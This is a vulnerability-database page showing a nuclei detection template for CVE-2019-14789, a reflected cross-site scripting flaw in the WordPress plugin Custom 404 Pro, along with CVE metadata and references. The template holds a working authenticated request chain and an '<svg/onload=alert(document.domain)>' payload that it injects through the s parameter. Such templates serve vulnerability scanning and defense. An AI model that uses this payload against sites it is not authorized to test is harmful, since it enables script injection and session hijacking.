Lucene search
K

Custom 404 Pro < 3.2.8 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

Custom 404 Pro < 3.2.8 - Cross-Site Scripting vulnerability. Injection of arbitrary script possible via title parameter, leading to session hijacking or theft of sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress Custom 404 Pro Plugin Cross-Site Scripting Vulnerability
16 Aug 201900:00
cnvd
CVE
CVE-2019-14789
15 Aug 201915:43
cve
Cvelist
CVE-2019-14789
15 Aug 201915:43
cvelist
EUVD
EUVD-2019-5921
7 Oct 202500:30
euvd
NVD
CVE-2019-14789
15 Aug 201916:15
nvd
Prion
Code injection
15 Aug 201916:15
prion
Prion
Cross site scripting
30 Aug 201917:15
prion
Positive Technologies
PT-2019-13834 · WordPress · Custom 404 Pro
15 Aug 201900:00
ptsecurity
RedhatCVE
CVE-2019-14789
22 May 202508:18
redhatcve
RedhatCVE
CVE-2019-15838
22 May 202506:06
redhatcve
Rows per page
id: CVE-2019-14789

info:
  name: Custom 404 Pro < 3.2.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd
    - https://wordpress.org/plugins/custom-404-pro/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14789
    - https://wordpress.org/plugins/custom-404-pro/#developers
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14789
    cwe-id: CWE-79
    epss-score: 0.01919
    epss-percentile: 0.77432
    cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: kunalnagar
    product: custom_404_pro
    framework: wordpress
  tags: cve,cve2019,wpscan,custom-404-pro,wp,wp-plugin,wordpress,authenticated,xss,kunalnagar,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=c4p-main&s=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
          - 'contains(body_2, "Custom 404 Pro")'
        condition: and
# digest: 490a0046304402207bdd7ac44df62d4015af0d5a4657f5f34325ccd59237bfc5279959597a6316270220777bd5317244aff472b532c7e0610a636b29bd583db3be86a5dca812cca8b3ca:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 36.1
EPSS0.01919
24